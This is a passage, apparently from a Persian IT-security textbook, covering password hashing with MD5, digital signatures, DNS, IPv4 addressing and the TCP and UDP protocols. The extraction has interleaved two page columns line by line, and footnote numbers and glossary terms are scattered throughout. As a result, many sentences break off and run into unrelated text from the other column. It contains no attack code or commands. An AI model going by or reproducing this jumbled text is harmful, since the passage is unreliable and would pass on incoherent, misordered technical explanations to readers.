ﺍﺣﺘﻤﺎﻝ ﺍﻳﻨﻜﻪ ﺧﺮﻭﺟﻲ ﺩﻭ ﻛﺪ ﺩﺭﻫﻢﺳﺎﺯﻱﺷﺪﻩ ﻣﺸﺎﺑﻪ ﻳﻜـﺪﻳﮕﺮ
ﻫﻤﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮ ﹺﺭ ﺳﺎﺩﺓ ﻣﻤﻜﻦ ﺭﺍ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻧﻤـﻮﺩﻩ ﻭ
ﺑﺎﺷﻨﺪ ﺗﻘﺮﻳﺒﹰﺎ ﺻﻔﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ.
ﺑﺎ ﻧﻤﻮﻧﻪﻫﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﺓ ﻣﻮﺟﻮﺩ ﺩﺭ ﺳﻴـﺴﺘﻢ ﺗﻄﺒﻴـﻖ
ﺩﻫﺪ ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺳﺎﺩﺓ ﺳﻴﺴﺘﻢ ﺭﺍ ﭘﻴـﺪﺍ ﺍﻳﻦ ﺭﻭﺵ ﻭ ﻛﺪ ﺧﺮﻭﺟﻲ ﺗﻮﻟﻴﺪ ﺷـﺪﻩ ﺩﺭ ﺁﻥ ﺩﻭ ﻛـﺎﺭﺑﺮﺩ ﺍﺻـﻠﻲ
ﻛﻨﺪ. ﺩﺍﺭﻧﺪ:
.۴ﭘﻴﺎﻡ ﻭ ﻛﺪ ﺩﺭﻫﻢﺳﺎﺯﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ. ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻛـﺎﺭﺑﺮ ﺍﺯ ﻛﻠﻤـﻪﺍﻱ
ﺑﻌﻨﻮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ،ﺍﻳﻦ ﻛﻠﻤﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ
.۵ﺷﻤﺎ ﭘﻴﺎﻡ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ.
ﺍﻟﮕــﻮﺭﻳﺘﻢ ) MD5ﻳــﺎ ﻳــﻚ ﺍﻟﮕــﻮﺭﻳﺘﻢ ﻣــﺸﺎﺑﻪ( ﺭﻣﺰﮔــﺬﺍﺭﻱ
.۶ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴــﺪ ﻋﻤــﻮﻣﻲ ﻭﻱ ﻛــﺪ ﺩﺭﻫــﻢﺳــﺎﺯﻱ ﺭﺍ ﻣﻲﺷﻮﺩ ﻭ ﻧﺴﺨﺔ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺫﺧﻴﺮﻩ ﻣﻲﮔﺮﺩﺩ .ﺑﺎﺭ ﺑﻌﺪ
ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻧﻤﺎﻳﻴﺪ ،ﻛﻪ ﻧﺘﻴﺠـﻪ ﺁﻥ ﺑﺪﺳـﺖ ﺁﻣـﺪﻥ ﻛـﺪ ﻛﻪ ﻛﺎﺭﺑﺮ ﺳﻌﻲ ﻣﻲﻛﻨﺪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﻮﺩ ،ﺁﻧﭽﻪ ﻛﻪ ﻭﺍﺭﺩ
ﺩﺭﻫﻢﺳﺎﺯﻱ ﺍﺻﻠﻲ ﺍﺳﺖ. ﻣﻲﻛﻨﺪ ﻣﺠﺪﺩﹰﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣـﻲﺷـﻮﺩ ﻭ ﺑـﺎ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ
ﺩﻳﺴﻚ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺑﻮﺩ ﻣﻘﺎﻳﺴﻪ ﻣﻲ ﮔـﺮﺩﺩ؛ ﻭ ﺩﺭﺻـﻮﺭﺕ
142 Hash
144 Digital Signature 143 Message Digest 5
١٠٩ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
١٤٧
ﺧﺪﻣﺎﺕ ﻧﺎﻡ ﺩﺍﻣﻨﻪ
ﭼﻮﻥ ﺑﻪ ﺧﺎﻃﺮ ﺳﭙﺮﺩﻥ ﺭﺷﺘﻪﻫﺎﻱ ﻃﻮﻻﻧﻲ ﺍﻋﺪﺍﺩ ﺳـﺨﺖ ﺍﺳـﺖ
١٤٨
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎ ﺣﺮﻭﻑ ﺍﻟﻔﺒﺎ )ﻛﻪ ﻧـﺎﻡ ﻣﻴﺰﺑـﺎﻥ
ﻧﺎﻣﻴـــﺪﻩ ﻣـــﻲﺷـــﻮﻧﺪ( ﻧﺎﻣﮕـــﺬﺍﺭﻱ ﺷـــﺪﻩﺍﻧـــﺪ .ﻧﻤﻮﻧـــﺔ ﺁﻥ
www.infodev.orgﺍﺳﺖ .ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳﻦ ﻧﺎﻡ ﺭﺍ ﺩﺭ ﻣﺮﻭﺭﮔﺮ
ﺿﻤﻴﻤﺔ ۲
ﻭﺏ ﻭﺍﺭﺩ ﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﻪ ﭘﻴﺎﻣﻲ ﺭﺍ ﺑـﻪ ﻳـﻚ ﺳـﺮﻭﻳﺲ ﺧـﺎﺹ ﺑﻨـﺎﻡ TCP/IP
DNSﺍﺭﺳﺎﻝ ﻣﻲﻛﻨـﺪ DNS .ﻣـﻲﺗﻮﺍﻧـﺪ ﺣـﺮﻭﻑ ﺍﻟﻔﺒـﺎ ﺭﺍ ﺑـﻪ
ﺑﺨﺶ ﺩﻭﻡ
ﺷﻤﺎﺭﻩ ﺗﺒﺪﻳﻞ ﻧﻤﺎﻳﺪ )ﺩﺭ ﺍﻳﻦ ﻣﺜﺎﻝ ﺷﻤﺎﺭﻩ ﻣﻮﺭﺩ ﻧﻈﺮ 192.86.99.121
ﭘﺮﻭﺗﻜــﻞ TCP/IPﻣﺠﻤﻮﻋــﻪﺍﻱ ﺍﺯ ﻗــﻮﺍﻧﻴﻦ ﺍﺳــﺖ ﻛــﻪ ﺗﻤــﺎﻡ
ﺍﺳـﺖ( .ﻫﻤﭽﻨﻴﻦ DNSﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺍﺟﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﭘﻴﺎﻣﻬﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨـﺪ .ﺍﮔﺮﭼـﻪ ﻧﻴـﺎﺯﻱ
ﻛﻪ ﺩﺭ ﻣﻜﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺟﺎﺑﺠـﺎ ﺷـﻮﺩ؛ ﭼـﻮﻥ ﺩﺍﻣﻨـﺔ ﻣﺮﺑﻮﻃـﻪ ﻧﻴﺴﺖ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻋـﺎﺩﻱ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻨﺘﺮﻧـﺖ ﺩﺭﺑـﺎﺭﺓ
ﺁﺩﺭﺱ ﺟﺪﻳــﺪ ﺭﺍ ﺑــﻪ DNSﺍﻃــﻼﻉ ﻣــﻲﺩﻫــﺪ ﻭ ﻟــﺬﺍ ﻛــﺎﺭﺑﺮﺍﻥ TCP/IPﺍﻃﻼﻉ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ ،ﺍﻣـﺎ ﺑﺎﻳـﺪ ﺩﺭﺑـﺎﺭﺓ ﭘﻴﻜـﺮﺑﻨـﺪﻱ
ﻫﻤﭽﻨﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻫﻤﺎﻥ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻨﺪ. ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻄﺎﻟﺒﻲ ﺑﺪﺍﻧﻨﺪ .ﺩﺭ ﺍﺩﺍﻣـﻪ
ﺷﺮﺡ ﺳﺎﺩﻩﺍﻱ ﺍﺯ ﻋﻤﻠﻜﺮﺩ TCP/IPﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ .ﺍﮔﺮ ﺑﺎ ﺍﻳﻦ
١٤٩
:IPﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻔﺎﻫﻴﻢ ﺁﺷﻨﺎ ﻫﺴﺘﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺧﻮﺍﻧﺪﻥ ﺍﻳﻦ ﻗﺴﻤﺖ ﺻـﺮﻓﻨﻈﺮ
ﻛﻨﻴﺪ.
ﻫﻨﮕﺎﻣﻴﻜﻪ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ ﺑـﻪ ﺷـﻜﻞ
١٥٠
ﻣﺠﻤﻮﻋﻪ ﺍﻱ ﺍﺯ ﺣﺮﻭﻑ ﻭ ﻧﺸﺎﻧﻪ ﺩﺭ ﻣﻲﺁﻳﻨﺪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺑـﺴﺘﻪ ﺁﺩﺭﺱﺩﻫﻲ ﺍﻳﻨﺘﺮﻧﺘﻲ
ﻳﺎ datagramﮔﻔﺘﻪ ﻣﻲﺷـﻮﺩ IP .ﺩﺭ TCP/IPﺑـﻪ ﻣﻌﻨـﺎﻱ
"ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ" ﺍﺳﺖ ﻭ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ ﻛـﻪ ﻗﺎﻟـﺐ ﺩﺍﺧﻠـﻲ ﻫﺮ ﺍﺑﺰﺍﺭ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺍﺭﺍﻱ ﻳﻚ ﺁﺩﺭﺱ IPﻣﻲﺑﺎﺷﺪ .ﺍﻳﻦ ﺁﺩﺭﺱ
ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎ ﺑﺎﻳﺪ ﭼﮕﻮﻧﻪ ﺑﺎﺷﺪ .ﺑﺴﺘﺔ IPﺷﺎﻣﻞ ﭼﻨـﺪﻳﻦ ﺑﺨـﺶ ﺑﻄﻮﺭ ﻛﻠﻲ ﺁﻥ ﺍﺑﺰﺍﺭ ﺭﺍ ﺑﺼﻮﺭﺕ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨـﺪ؛
ﺍﻃﻼﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻣﻴﺎﻥ ﺁﻥ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﻧﺪ: ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﺩﺭ ﺗﻤـﺎﻡ ﺩﻧﻴـﺎ ﺁﺩﺭﺱ ﺧﺎﻧـﺔ ﺷـﻤﺎ ﺭﺍ
ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ .ﺁﺩﺭﺳﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻧـﺴﺨﺔ ﺟـﺎﺭﻱ TCP/IP
ﺍﻧﺪﺍﺯﺓ ﺑﺴﺘﻪ؛ •
)ﻛﻪ ﺑﻪ ﻧﺎﻡ IPv4ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ( ﺍﻋﺪﺍﺩ ۳۲ﺑﻴﺘﻲ ﺩﻭﺩﻭﻳﻲ ﻫـﺴﺘﻨﺪ.
ﺁﺩﺭﺱ IPﮔﻴﺮﻧﺪﻩ؛ • ﻳﻌﻨﻲ ﺗﻌﺪﺍﺩ ﺁﺩﺭﺳﻬﺎﻱ ﻣﻤﻜـﻦ ۲۳۲=۴۲۹۴۹۶۷۲۹۶ ،ﻣـﻲﺑﺎﺷـﺪ.
ﺁﺩﺭﺱ IPﻣﺤﻠﻲ ﻛﻪ ﺑﺴﺘﻪ ﺍﺯ ﺁﻧﺠﺎ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ؛ ﻭ •
ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﻭ ﺑﺨﺎﻃﺮ ﺳﭙﺮﺩﻥ ﺳﺎﺩﻩﺗـﺮ ﺁﻧﻬـﺎ ،ﺍﻋـﺪﺍﺩ ۳۲ﺑﻴﺘـﻲ
ﺩﻭﺩﻭﻳﻲ ﺑﻪ ۴ﺑﺨـﺶ ۸ﺑﻴﺘـﻲ ﺗﻘـﺴﻴﻢﺑﻨـﺪﻱ ﺷـﺪﻩﺍﻧـﺪ .ﭼـﻮﻥ
ﻧﻮﻉ ﺑﺴﺘﻪ. • ۲۸=۲۵۶ﺍﺳﺖ ،ﻫﺮ ﺑﺨﺶ ۸ﺑﻴﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻜﻲ ﺍﺯ ﺍﻋﺪﺍﺩ ۰ﺗـﺎ
ﻫﻨﮕﺎﻣﻴﻜــﻪ ﻳــﻚ ﺑــﺴﺘﻪ ﺍﺯ ﺭﺍﻳﺎﻧــﺔ ﺷــﻤﺎ ﺍﺭﺳــﺎﻝ ﻣــﻲﺷــﻮﺩ ﺑــﻪ ﻻ ﺑﺪﻧﺒﺎﻝ ﻫﻢ ﻣﻲﺁﻳﻨﺪ ﻭ ﺑـﺎ ﻳـﻚ ۲۵۵ﺑﺎﺷﺪ .ﺍﻳﻦ ۴ﺷﻤﺎﺭﻩ ﻣﻌﻤﻮ ﹰ
ﻧﺰﺩﻳﻜﺘﺮﻳﻦ ﻣﺴﻴﺮﻳﺎﺏ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻭ ﺁﻥ ﻧﻴﺰ ﺳﻌﻲ ﻣﻲﻛﻨـﺪ ﻧﻘﻄﻪ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺗﻔﻜﻴﻚ ﻣﻲﺷﻮﻧﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻛـﻮﭼﻜﺘﺮﻳﻦ ﺁﺩﺭﺱ
ﺑﺴﺘﻪ ﺭﺍ ﺩﺭ ﻃﻮﻝ ﻣﺴﻴﺮ ﺑﻪ ﻣﺴﻴﺮﻳﺎﺏ ﺑﻌﺪﻱ ﺍﺭﺳﺎﻝ ﻛﻨـﺪ ﻭ ﺍﻳـﻦ ﺍﻳﻨﺘﺮﻧﺘــﻲ 0.0.0.0ﻭ ﺑﺰﺭﮔﺘــﺮﻳﻦ ﺁﻥ 255.255.255.255
ﻛﺎﺭ ﺍﺩﺍﻣﻪ ﻣﻲﻳﺎﺑﺪ ﺗﺎ ﺑﺴﺘﻪ ﺑﻪ ﻣﻘﺼﺪ ﺧﻮﺩ ﺑﺮﺳـﺪ .ﺍﮔـﺮ ﻣـﺸﻜﻠﻲ ﺍﺳﺖ .ﻧﻤﻮﻧـﺔ ﻳـﻚ ﺁﺩﺭﺱ IPﺑـﻪ ﺷـﻜﻞ 24.200.195.15
ﺑﻮﺟﻮﺩ ﺁﻳﺪ ﻳﺎ ﺗﺮﺍﻛﻢ ﺑﺴﺘﻪﻫﺎ ﺯﻳﺎﺩ ﺑﺎﺷﺪ ﺑﺴﺘﻪ ﻧﻤـﻲﺗﻮﺍﻧـﺪ ﺍﺭﺳـﺎﻝ ﻣﻲ ﺑﺎﺷﺪ .ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺑﺰﺍﺭﻱ ﺑﻨﺎﻡ ﻣﺴﻴﺮﻳﺎﺏ ١٤٦ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ
ﺷﻮﺩ ﻭ ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻩ ﻣﺘﻮﻗﻒ ﺧﻮﺍﻫﺪ ﺷﺪ .ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴـﻞ ﺑـﻪ IP ﻣﺴﻴﺮ ﻫﺮ ﺁﺩﺭﺱ IPﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﻨﺪ ﻭ ﻣﻲﺩﺍﻧـﺪ ﻛـﻪ ﺑـﺮﺍﻱ
ﭘﺮﻭﺗﻜﻞ ﻏﻴﺮﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ١٥١ﻣﻲﮔﻮﻳﻨﺪ .ﺍﮔﺮﭼـﻪ ﻃﺒـﻖ ﺗﺌـﻮﺭﻱ ﺩﺳﺖﻳﺎﻓﺘﻦ ﺑﻪ ﻫﺮ ﺁﺩﺭﺱ ﺑﺎﻳﺪ ﻛﺪﺍﻡ ﻣﺴﻴﺮ ﺭﺍ ﺑﺮﮔﺰﻳﺪ.
ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ .ﻓﺮﺳﺘﺎﺩﻥ ﺗﺮﺗﻴﺒﻲ ﺍﻃﻼﻋﺎﺕ ﺳﺒﺐ ﻣﻲﺷﻮﺩ ﻛﻪ IPﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻧﻴﺴﺖ ،ﺍﻣﺎ ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﺗﻤﺎﻣﻲ ﺑﺴﺘﻪﻫـﺎﻱ
ﺑﺮﻧﺎﻣﺔ ﺩﺭﻳـﺎﻓﺘﻲ ﺍﻳـﻦ ﻗـﺴﻤﺘﻬﺎ ﺭﺍ ﺑـﺎ ﺗﺮﺗﻴﺒـﻲ ﺻـﺤﻴﺢ ﻣﺠـﺪﺩﹰﺍ ﺍﺭﺳﺎﻟﻲ ﺭﺍ ﺑﻪ ﻣﻘﺼﺪ ﻣﻲﺭﺳﺎﻧﺪ.
ﮔﺮﺩﺁﻭﺭﻱ ﻧﻤﺎﻳﺪ .ﺍﻣﺎ ﺑﻪ ﺩﻻﻳﻞ ﻣﺘﻌـﺪﺩ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﻌـﻀﻲ ﺍﺯ ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻔﻲ ﺍﺯ ﺑﺴﺘﻪﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺭﺳﺎﻝ ﺷﻮﻧﺪ
ﺑﺴﺘﻪﻫﺎ ﺳﺮﻳﻌﺘﺮ ﺍﺯ ﺑﺴﺘﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺑﻪ ﻣﻘﺼﺪ ﺑﺮﺳﻨﺪ ﻭ ﺍﻳﻦ ﺑﺪﺍﻥ ﺍﻣﺎ ﺩﺭ ﺍﻳﻨﺠﺎ ﺗﻨﻬﺎ ﺑﻪ ﺩﻭ ﻧﻮﻉ ﺍﺯ ﺁﻧﻬﺎ ﺍﺷـﺎﺭﻩ ﻣـﻲﻛﻨـﻴﻢ TCP :ﻭ
ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﺑﺴﺘﻪﻫﺎ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﻨﺪ ﺧﺎﺭﺝ ﺍﺯ ﺗﺮﺗﻴﺒﻲ ﻛﻪ ﻓﺮﺳﺘﺎﺩﻩ .UDP
ﺷﺪﻩﺍﻧﺪ ﺩﺭﻳﺎﻓﺖ ﺷﻮﻧﺪ .ﺍﺯ ﺳﻮﻱ ﺩﻳﮕﺮ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻃﺒـﻖ ﺗﺌـﻮﺭﻱ
ﻣﺎﻫﻴﺖ IPﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻧﻴﺴﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻀﻲ ﺍﺯ ﺑﺴﺘﻪﻫﺎ ١٥٢
:TCPﭘﺮﻭﺗﻜﻞ ﻛﻨﺘﺮﻝ ﺍﻧﺘﻘﺎﻝ
ﻫﺮﮔﺰ ﺑﻪ ﻣﻘﺼﺪ ﻧﺮﺳﻨﺪ .ﺩﺭ ﺍﻳﻦ ﻣـﻮﺭﺩ ﺑﺮﻧﺎﻣـﺔ ﺩﺭﻳـﺎﻓﺘﻲ ﻣﺘﻮﺟـﻪ
TCPﭘﺮﻭﺗﻜﻠﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺑﻴﺸﺘﺮ ﭘﻴﺎﻣﻬﺎ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﻭ ﺷﺎﻣﻞ
ﻣﻲﺷﻮﺩ ﻛﻪ ﻳﻚ ﺷﻜﺎﻑ ﻣﻴﺎﻥ ﺗﺮﺗﻴﺐ ﺩﺭﻳﺎﻓﺖ ﺑﺴﺘﻪﻫـﺎ ﺭﺥ ﺩﺍﺩﻩ
ﻭﺏ ) ،(HTTPﭘﺮﻭﺗﻜـــﻞ ﺍﻧﺘﻘـــﺎﻝ ﻓﺎﻳـــﻞ ) ١٥٣(FTPﻭ ﻧﺎﻣـــﺔ
ﺍﺳﺖ ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻨﺪ ﻛـﻪ ﺑـﺴﺘﺔ ﮔـﻢ ﺷـﺪﻩ ﻣﺠـﺪﺩﹰﺍ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲ ﺑﺎﺷﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺩﺍﺩﺓ ﺍﺭﺳـﺎﻝﺷـﺪﻩ ،ﺑـﺴﺘﻪ ﻫـﺎﻱ
ﺍﺭﺳﺎﻝ ﺷﻮﺩ.
TCPﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﻫﻢ ﻣﻲﺑﺎﺷﻨﺪ:
ﻫﻨﮕﺎﻣﻴﻜﻪ ﻓﺮﺳﺘﻨﺪﻩ ﻳـﻚ ﺑـﺴﺘﺔ TCPﺑﻔﺮﺳـﺘﺪ ،ﺍﻳـﻦ ﺍﻧﺘﻈـﺎﺭ ١٥٤
۱۶ﺑﻴﺖ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺍﺭﺳﺎﻟﻲ؛ •
ﻣﻲﺭﻭﺩ ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﺑﺎ ﺑﺎﺯﭘﺲ ﻓﺮﺳـﺘﺎﺩﻥ ﺍﻃﻼﻋـﺎﺕ
١٥٥
ﺗﺼﺪﻳﻘﻲ ﻣﺨـﺼﻮﺹ ،ﺩﺭﻳﺎﻓـﺖ ﺁﻧـﺮﺍ ﺗـﺼﺪﻳﻖ ﻛﻨـﺪ .ﺍﮔـﺮ ﭘﻴـﺎﻡ ۱۶ﺑﻴﺖ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺩﺭﻳﺎﻓﺘﻲ؛ •
ﺗﺼﺪﻳﻖ ﻳﻚ ﺑﺴﺘﻪ ﺩﺭ ﺑﺎﺯﺓ ﺯﻣﺎﻧﻲ ﻣﺸﺨﺺﺷﺪﻩﺍﻱ ﺑـﺎﺯ ﻧﮕـﺮﺩﺩ، ﺍﻃﻼﻋﺎﺕ ﺗﺮﺗﻴﺒﻲ ١٥٦ﺑﺴﺘﻪﻫﺎ؛ ﻭ •
ﺑﺴﺘﻪ ﻣﺠﺪﺩﹰﺍ ﺍﺭﺳﺎﻝ ﺧﻮﺍﻫﺪ ﺷﺪ .ﺑﻪ ﺩﻟﻴﻞ ﻭﺟﻮﺩ ﺍﻋﺪﺍﺩ ﺗﺮﺗﻴﺒـﻲ ﻭ ١٥٧
ﺍﻃﻼﻋﺎﺕ ﺗﺼﺪﻳﻘﻲ. •
ﺗﺼﺪﻳﻘﻲ ﺑﺴﺘﻪﻫﺎ TCP ،ﻳﻚ ﭘﺮﻭﺗﻜﻞ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ١٥٨ﺍﺳـﺖ ﻭ
ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻛـﺎﺭﺑﺮﺩﻱ ،ﻛـﺎﺭﺑﺮ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﻓﻘﻂ ﻳﻚ ﺁﺩﺭﺱ IPﺩﺍﺭﺩ ﺍﺯ ﺷﻤﺎﺭﻩ ﭘـﻮﺭﺕ
ﻣﻲﺗﻮﺍﻧﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺍﺷﺘﺒﺎﻩ ﻭ ﻳـﺎ ﺧﻄـﺎ ﺩﺭ ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﭘﻴﺎﻡ ﺭﺍ ﺍﺭﺳﺎﻝ ﻭ ﻳﺎ ﺩﺭﻳﺎﻓﺖ
ﺍﻧﺘﻘﺎﻝ ﻳﺎ ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺕ ،ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﺟﺮﻳﺎﻥ ﺁﻥ ﻗﺮﺍﺭ ﺧﻮﺍﻫـﺪ ﻣﻲﻛﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ .ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻲ ﺍﺳﺖ ﻛﻪ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫـﺪ
ﮔﺮﻓﺖ. ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﭼﻨﺪﻳﻦ ﻣﺮﻭﺭﮔﺮ ﻭﺏ ﺑﺎﺯ ﺑﺎﺷﺪ ﻭ ﺑﺘﻮﺍﻥ ﺑﻮﺳـﻴﻠﺔ ﺁﻧﻬـﺎ
ﺻﻔﺤﺎﺕ ﺩﺭﺧﻮﺍﺳﺘﻲ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﻧﻤﻮﺩ .ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻳـﻚ ﺑﺮﻧﺎﻣـﻪ
١٥٩
:UDPﭘﺮﻭﺗﻜﻞ datagramﻛﺎﺭﺑﺮ ﭘﻴﺎﻡ TCPﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﺑﺎﻳﺪ ﺭﻭﻱ ﭘﻮﺭﺕ ﺻـﺤﻴﺤﻲ ﻣﻨﺘﻈـﺮ
UDPﻗﺎﻟﺐ ﺳﺎﺩﻩﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ ﺍﻃﻼﻋـﺎﺕ ﻣـﻮﺭﺩ ﻻ ﺑﺮﺍﻱ ﻫﺮ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﻛـﺎﺭﺑﺮﺩﻱ ﺧـﺎﺹ ،ﻳـﻚ ﭘﻴﺎﻡ ﺑﻤﺎﻧﺪ .ﻣﻌﻤﻮ ﹰ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ .ﻫﺮ ﺑﺴﺘﺔ UDPﻋﻼﻭﻩ ﺑﺮ ﺩﺍﺩﻩﻫـﺎ ﺩﺍﺭﺍﻱ ﭘﻮﺭﺕ ﻣﺸﺨﺺ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﭘﻮﺭﺕ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ
